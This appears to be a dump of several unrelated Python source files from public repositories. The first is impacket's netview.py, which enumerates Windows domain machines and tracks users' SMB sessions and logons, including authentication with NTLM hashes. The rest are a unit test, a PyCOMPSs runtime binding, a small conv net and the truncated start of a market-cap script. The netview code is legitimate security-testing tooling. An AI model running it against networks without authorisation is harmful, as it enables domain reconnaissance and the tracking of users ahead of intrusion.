grkoll/impacket
|
90a91045139659d83409af1771dcaf697c00de99
|
[
"Apache-1.1"
] | null | null | null |
examples/netview.py
|
grkoll/impacket
|
90a91045139659d83409af1771dcaf697c00de99
|
[
"Apache-1.1"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# beto (@agsolino)
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
# YOU HAVE TO BE ABLE TO RESOLV THE DOMAIN MACHINES NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
#
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from Queue import Queue
from time import sleep
from impacket.examples import logger
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception, e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = options.dc_ip
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__targetsThread = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__kdcHost is not None:
domainController = self.__kdcHost
elif self.__domain is not '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception, e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
# Since it's gonna be a one shoot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in self.__targets.keys():
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException), e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception, e:
#import traceback
#print traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
# Let's see who createad a connection since last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF = True
else:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF = True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
else:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
if printCRLF is True:
print
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
# Let's see who looged in locally since last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
if printCRLF is True:
print
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
# Process command-line arguments.
if __name__ == '__main__':
print version.BANNER
# Init the example's logger theme
logger.init()
parser = argparse.ArgumentParser()
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-user', action='store', help='Filter output by this user')
parser.add_argument('-users', type=argparse.FileType('r'), help='input file with list of users to filter to output for')
#parser.add_argument('-group', action='store', help='Filter output by members of this group')
#parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
parser.add_argument('-target', action='store', help='target system to query info from. If not specified script will run in domain mode.')
parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query info from (one per line). If not specified script will run in domain mode.')
parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe (default 10 seconds)')
parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep opened (default 1000)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::([^@]*))?)?').match(options.identity).groups(
'')
try:
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
executer.run()
except Exception, e:
#import traceback
#print traceback.print_exc()
logging.error(e)
executer.stop()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
executer.stop()
sys.exit(0)
| 43.927711
| 251
| 0.58507
|
dfdd83407c31a6bf12b76400d0a219c59b0c63b8
| 532
|
py
|
Python
|
edge_case_finder/tests/test_checker/test_checker.py
|
KaustubhDamania/TC-Generator-Checker
|
268b9a99754d4f8d7df94829a3345444cbe11672
|
[
"MIT"
] | 1
|
2020-11-03T17:07:14.000Z
|
2020-11-03T17:07:14.000Z
|
edge_case_finder/tests/test_checker/test_checker.py
|
KaustubhDamania/TC-Generator-Checker
|
268b9a99754d4f8d7df94829a3345444cbe11672
|
[
"MIT"
] | 1
|
2020-10-31T08:09:06.000Z
|
2020-10-31T08:09:06.000Z
|
edge_case_finder/tests/test_checker/test_checker.py
|
KaustubhDamania/TC-Generator-Checker
|
268b9a99754d4f8d7df94829a3345444cbe11672
|
[
"MIT"
] | null | null | null |
from checker import Checker
from .input_fn import *
import unittest
import os
class SimpleTest(unittest.TestCase):
def test1(self):
os.chdir('tests/test_checker')
checker = Checker('./test1_correct.out', 'python3 test1_soln.py', input_fn1)
self.assertTrue(checker.check_randomised(100))
def test2(self):
checker = Checker('./test2_correct.out', './test2_soln.out', input_fn2)
self.assertFalse(checker.check_randomised(100))
if __name__ == '__main__':
unittest.main()
| 26.6
| 84
| 0.684211
|
8fc3cfb1e42015e01d555535bf1fdd6d7d802147
| 13,311
|
py
|
Python
|
compss/programming_model/bindings/python/src/pycompss/runtime/management/COMPSs.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/runtime/management/COMPSs.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/runtime/management/COMPSs.py
|
eflows4hpc/compss
|
c497f6d34722103c6c8f83ebc314b495573ce054
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Binding - Management - Runtime
=======================================
This file contains the COMPSs runtime connection.
Loads the external C module.
"""
from pycompss.util.typing_helper import typing
from pycompss.runtime.management.link import establish_interactive_link
from pycompss.runtime.management.link import establish_link
from pycompss.util.exceptions import PyCOMPSsException
if __debug__:
import logging
logger = logging.getLogger(__name__)
# C module extension for the communication with the runtime
# See ext/compssmodule.cc
# Keep the COMPSs runtime link in this module so that any module can access
# it through the module methods.
_COMPSs = None # type: typing.Any
# Files where the std may be redirected with interactive
_STDOUT = ""
_STDERR = ""
######################################################
# INTERNAL FUNCTIONS #
######################################################
def load_runtime(external_process: bool = False, _logger: typing.Any = None) -> None:
"""Loads the external C extension module.
:param external_process: Loads the runtime in an external process if true.
Within this python process if false.
:param _logger: Use this logger instead of the module logger.
:return: None
"""
global _COMPSs
global _STDOUT
global _STDERR
if external_process:
# For interactive python environments
_COMPSs, _STDOUT, _STDERR = establish_interactive_link(_logger, True)
else:
# Normal python environments
_COMPSs = establish_link(_logger)
def is_redirected() -> bool:
"""Check if the stdout and stderr are being redirected.
:return: If stdout/stderr are being redirected.
"""
if _STDOUT == "" and _STDERR == "":
return False
elif _STDOUT != "" and _STDERR != "":
return True
else:
raise PyCOMPSsException("Inconsistent status of _STDOUT and _STDERR")
def get_redirection_file_names() -> typing.Tuple[str, str]:
"""Retrieves the stdout and stderr file names.
:return: The stdout and stderr file names.
"""
if is_redirected():
return _STDOUT, _STDERR
else:
message = "The runtime stdout and stderr are not being redirected."
raise PyCOMPSsException(message)
######################################################
# COMPSs API EXPOSED FUNCTIONS #
######################################################
def start_runtime() -> None:
"""Call to start_runtime.
:return: None
"""
_COMPSs.start_runtime() # noqa
def set_debug(mode: bool) -> None:
"""Call to set_debug.
:param mode: Debug mode
:return: None
"""
_COMPSs.set_debug(mode) # noqa
def stop_runtime(code: int) -> None:
"""Call to stop_runtime.
:param code: Code
:return: None
"""
_COMPSs.stop_runtime(code) # noqa
def cancel_application_tasks(app_id: int, value: int) -> None:
"""Call to cancel_application_tasks.
:param app_id: Application identifier.
:param value: Value
:return: None
"""
_COMPSs.cancel_application_tasks(app_id, value) # noqa
def accessed_file(app_id: int, file_name: str) -> bool:
"""Call to accessed_file.
:param app_id: Application identifier.
:param file_name: File name.
:return: If the file has been accessed.
"""
return _COMPSs.accessed_file(app_id, file_name) # noqa
def open_file(app_id: int, file_name: str, mode: int) -> str:
"""Call to open_file.
:param app_id: Application identifier.
:param file_name: File name reference.
:param mode: Open mode.
:return: The real file name.
"""
return _COMPSs.open_file(app_id, file_name, mode) # noqa
def close_file(app_id: int, file_name: str, mode: int) -> None:
"""Call to close_file.
:param app_id: Application identifier.
:param file_name: File name reference.
:param mode: Close mode.
:return: None
"""
_COMPSs.close_file(app_id, file_name, mode) # noqa
def delete_file(app_id: int, file_name: str, mode: bool) -> bool:
"""Call to delete_file.
:param app_id: Application identifier.
:param file_name: File name reference.
:param mode: Delete mode.
:return: The deletion result.
"""
result = _COMPSs.delete_file(app_id, file_name, mode) # noqa
if result is None:
return False
else:
return result
def get_file(app_id: int, file_name: str) -> None:
"""Call to get_file.
:param app_id: Application identifier.
:param file_name: File name.
:return: None
"""
_COMPSs.get_file(app_id, file_name) # noqa
def get_directory(app_id: int, file_name: str) -> None:
"""Call to get_directory.
:param app_id: Application identifier.
:param file_name: File name.
:return: None
"""
_COMPSs.get_directory(app_id, file_name) # noqa
def barrier(app_id: int, no_more_tasks: bool) -> None:
"""Call to barrier.
:param app_id: Application identifier.
:param no_more_tasks: No more tasks boolean.
:return: None
"""
_COMPSs.barrier(app_id, no_more_tasks) # noqa
def barrier_group(app_id: int, group_name: str) -> str:
"""Call barrier_group.
:param app_id: Application identifier.
:param group_name: Group name.
:return: Exception message.
"""
return str(_COMPSs.barrier_group(app_id, group_name)) # noqa
def open_task_group(group_name: str, implicit_barrier: bool, app_id: int) -> None:
"""Call to open_task_group.
:param group_name: Group name.
:param implicit_barrier: Implicit barrier boolean.
:param app_id: Application identifier.
:return: None
"""
_COMPSs.open_task_group(group_name, implicit_barrier, app_id) # noqa
def close_task_group(group_name: str, app_id: int) -> None:
"""Call to close_task_group.
:param group_name: Group name.
:param app_id: Application identifier.
:return: None
"""
_COMPSs.close_task_group(group_name, app_id) # noqa
def get_logging_path() -> str:
"""Call to get_logging_path.
:return: The COMPSs log path
"""
return _COMPSs.get_logging_path() # noqa
def get_number_of_resources(app_id: int) -> int:
"""Call to number_of_resources.
:param app_id: Application identifier
:return: Number of resources
"""
return _COMPSs.get_number_of_resources(app_id) # noqa
def request_resources(app_id: int, num_resources: int, group_name: str) -> None:
"""Call to request_resources.
:param app_id: Application identifier.
:param num_resources: Number of resources.
:param group_name: Group name.
:return: None
"""
_COMPSs.request_resources(app_id, num_resources, group_name) # noqa
def free_resources(app_id: int, num_resources: int, group_name: str) -> None:
"""Call to free_resources.
:param app_id: Application identifier.
:param num_resources: Number of resources.
:param group_name: Group name.
:return: None
"""
_COMPSs.free_resources(app_id, num_resources, group_name) # noqa
def set_wall_clock(app_id: float, wcl: float) -> None:
"""Call to set_wall_clock.
:param app_id: Application identifier.
:param wcl: Wall Clock limit in seconds.
:return: None
"""
_COMPSs.set_wall_clock(app_id, wcl) # noqa
def register_core_element(
ce_signature: str,
impl_signature: typing.Optional[str],
impl_constraints: typing.Optional[str],
impl_type: typing.Optional[str],
impl_io: str,
prolog: typing.List[str],
epilog: typing.List[str],
impl_type_args: typing.List[str]
) -> None:
"""Call to register_core_element.
:param ce_signature: Core element signature
:param impl_signature: Implementation signature
:param impl_constraints: Implementation constraints
:param impl_type: Implementation type
:param impl_io: Implementation IO
:param prolog: [binary, params, fail_by_exit_value] of the prolog
:param epilog: [binary, params, fail_by_exit_value] of the epilog
:param impl_type_args: Implementation type arguments
:return: None
"""
_COMPSs.register_core_element(
ce_signature, # noqa
impl_signature,
impl_constraints,
impl_type,
impl_io,
prolog,
epilog,
impl_type_args,
)
def process_task(
app_id: int,
signature: str,
on_failure: str,
time_out: int,
has_priority: bool,
num_nodes: int,
reduction: bool,
chunk_size: int,
replicated: bool,
distributed: bool,
has_target: bool,
num_returns: int,
values: list,
names: list,
compss_types: list,
compss_directions: list,
compss_streams: list,
compss_prefixes: list,
content_types: list,
weights: list,
keep_renames: list,
) -> None:
"""Call to process_task.
:param app_id: Application identifier
:param signature: Task signature
:param on_failure: On failure action
:param time_out: Task time out
:param has_priority: Boolean has priority
:param num_nodes: Number of nodes
:param reduction: Boolean indicating if the task is of type reduce
:param chunk_size: Size of chunks for executing the reduce operation
:param replicated: Boolean is replicated
:param distributed: Boolean is distributed
:param has_target: Boolean has target
:param num_returns: Number of returns
:param values: Values
:param names: Names
:param compss_types: COMPSs types
:param compss_directions: COMPSs directions
:param compss_streams: COMPSs streams
:param compss_prefixes: COMPSs prefixes
:param content_types: COMPSs types
:param weights: Parameter weights
:param keep_renames: Boolean keep renames
:return: None
"""
_COMPSs.process_task(
app_id, # noqa
signature,
on_failure,
time_out,
has_priority,
num_nodes,
reduction,
chunk_size,
replicated,
distributed,
has_target,
num_returns,
values,
names,
compss_types,
compss_directions,
compss_streams,
compss_prefixes,
content_types,
weights,
keep_renames,
)
def process_http_task(
app_id: int,
signature: str,
on_failure: str,
time_out: int,
has_priority: bool,
num_nodes: int,
reduction: bool,
chunk_size: int,
replicated: bool,
distributed: bool,
has_target: bool,
num_returns: int,
values: list,
names: list,
compss_types: list,
compss_directions: list,
compss_streams: list,
compss_prefixes: list,
content_types: list,
weights: list,
keep_renames: list,
) -> None:
"""Call to process_http_task.
:param app_id: Application identifier
:param signature: Task signature
:param on_failure: On failure action
:param time_out: Task time out
:param has_priority: Boolean has priority
:param num_nodes: Number of nodes
:param reduction: Boolean indicating if the task is of type reduce
:param chunk_size: Size of chunks for executing the reduce operation
:param replicated: Boolean is replicated
:param distributed: Boolean is distributed
:param has_target: Boolean has target
:param num_returns: Number of returns
:param values: Values
:param names: Names
:param compss_types: COMPSs types
:param compss_directions: COMPSs directions
:param compss_streams: COMPSs streams
:param compss_prefixes: COMPSs prefixes
:param content_types: COMPSs types
:param weights: Parameter weights
:param keep_renames: Boolean keep renames
:return: None
"""
_COMPSs.process_http_task(
app_id, # noqa
signature,
on_failure,
time_out,
has_priority,
num_nodes,
reduction,
chunk_size,
replicated,
distributed,
has_target,
num_returns,
values,
names,
compss_types,
compss_directions,
compss_streams,
compss_prefixes,
content_types,
weights,
keep_renames,
)
def set_pipes(pipe_in: str, pipe_out: str) -> None:
"""Set nesting pipes.
:param pipe_in: Input pipe.
:param pipe_out: Output pipe.
:return: None
"""
_COMPSs.set_pipes(pipe_in, pipe_out) # noqa
def read_pipes() -> str:
"""Call to read_pipes.
:return: The command read from the pipe
"""
o = _COMPSs.read_pipes() # noqa
return o
| 27
| 85
| 0.658929
|
abac7832d832f62bcee80f9f3c287b3619efe3a4
| 3,588
|
py
|
Python
|
assignments/assignment3/model.py
|
nikitakogut/dlcourse_ai
|
bd5826c04331864e0c37c84cf33674438d3f9b01
|
[
"MIT"
] | 1
|
2019-03-27T09:18:47.000Z
|
2019-03-27T09:18:47.000Z
|
assignments/assignment3/model.py
|
nikitakogut/dlcourse_ai
|
bd5826c04331864e0c37c84cf33674438d3f9b01
|
[
"MIT"
] | null | null | null |
assignments/assignment3/model.py
|
nikitakogut/dlcourse_ai
|
bd5826c04331864e0c37c84cf33674438d3f9b01
|
[
"MIT"
] | null | null | null |
import numpy as np
from layers import (
FullyConnectedLayer, ReLULayer,
ConvolutionalLayer, MaxPoolingLayer, Flattener,
softmax_with_cross_entropy, l2_regularization, softmax
)
class ConvNet:
"""
Implements a very simple conv net
Input -> Conv[3x3] -> Relu -> Maxpool[4x4] ->
Conv[3x3] -> Relu -> MaxPool[4x4] ->
Flatten -> FC -> Softmax
"""
def __init__(self, input_shape, n_output_classes, conv1_channels, conv2_channels, reg=0):
"""
Initializes the neural network
Arguments:
input_shape, tuple of 3 ints - image_width, image_height, n_channels
Will be equal to (32, 32, 3)
n_output_classes, int - number of classes to predict
conv1_channels, int - number of filters in the 1st conv layer
conv2_channels, int - number of filters in the 2nd conv layer
"""
self.reg = reg
# TODO Create necessary layers
assert input_shape[0] % 4 == 0 & input_shape[1] % 4 == 0, "Invalid input_shape value"
self.layers = [ConvolutionalLayer(input_shape[2], conv1_channels, 3, 0),
ReLULayer(),
MaxPoolingLayer(4, 4),
ConvolutionalLayer(conv1_channels, conv2_channels, 3, 0),
ReLULayer(),
MaxPoolingLayer(4, 4),
Flattener(),
FullyConnectedLayer(4 * conv2_channels, n_output_classes)
]
def compute_loss_and_gradients(self, X, y):
"""
Computes total loss and updates parameter gradients
on a batch of training examples
Arguments:
X, np array (batch_size, height, width, input_features) - input data
y, np array of int (batch_size) - classes
"""
# Before running forward and backward pass through the model,
# clear parameter gradients aggregated from the previous pass
# TODO Compute loss and fill param gradients
# Don't worry about implementing L2 regularization, we will not
# need it in this assignment
for layer in self.layers:
if {'W', 'B'} <= set(layer.params()):
layer.W.grad = np.zeros(layer.W.value.shape)
layer.B.grad = np.zeros(layer.B.value.shape)
forward_val = X
for layer in self.layers:
forward_val = layer.forward(forward_val)
loss, backward_val = softmax_with_cross_entropy(forward_val, y)
for layer in self.layers[::-1]:
backward_val = layer.backward(backward_val)
for layer in self.layers:
for param_name, param in layer.params().items():
loss_reg, grad_reg = l2_regularization(param.value, self.reg)
loss += loss_reg
param.grad += grad_reg
return loss
def predict(self, X):
# You can probably copy the code from previous assignment
pred = np.zeros(X.shape[0], np.int)
forward_val = X
for layer in self.layers:
forward_val = layer.forward(forward_val)
pred = np.argmax(softmax(forward_val), axis=1)
return pred
def params(self):
result = {}
# TODO: Aggregate all the params from all the layers
# which have parameters
for ind, layer in enumerate(self.layers):
for param in layer.params().items():
result['layer_' + str(ind/2+1) + '_' + param[0]] = param[1]
return result
| 39
| 93
| 0.585006
|
dc74f6efda221819ef086f329a77909174662beb
| 4,536
|
py
|
Python
|
product/market-capture/market_capture.py
|
anthonymbowman/index-coop-analytics
|
ed1b0801850a206d5a6fc2f8b6a80fa0fd024042
|
[
"MIT"
] | 12
|
2021-04-12T23:19:55.000Z
|
2021-09-06T21:56:26.000Z
|
product/market-capture/market_capture.py
|
anthonymbowman/index-coop-analytics
|
ed1b0801850a206d5a6fc2f8b6a80fa0fd024042
|
[
"MIT"
] | 70
|
2021-04-05T19:48:22.000Z
|
2021-09-21T14:00:06.000Z
|
product/market-capture/market_capture.py
|
anthonymbowman/index-coop-analytics
|
ed1b0801850a206d5a6fc2f8b6a80fa0fd024042
|
[
"MIT"
] | 15
|
2021-04-27T04:15:14.000Z
|
2021-09-08T15:21:00.000Z
|
# _*_ encoding:utf-8 _*_
# This script calculates index market capture by day through coingekco api
# market capture = index market cap / sum(each composition's market cap in the index )
# prerequisite:
# 1. install coingecko api python library https://github.com/man-c/pycoingecko
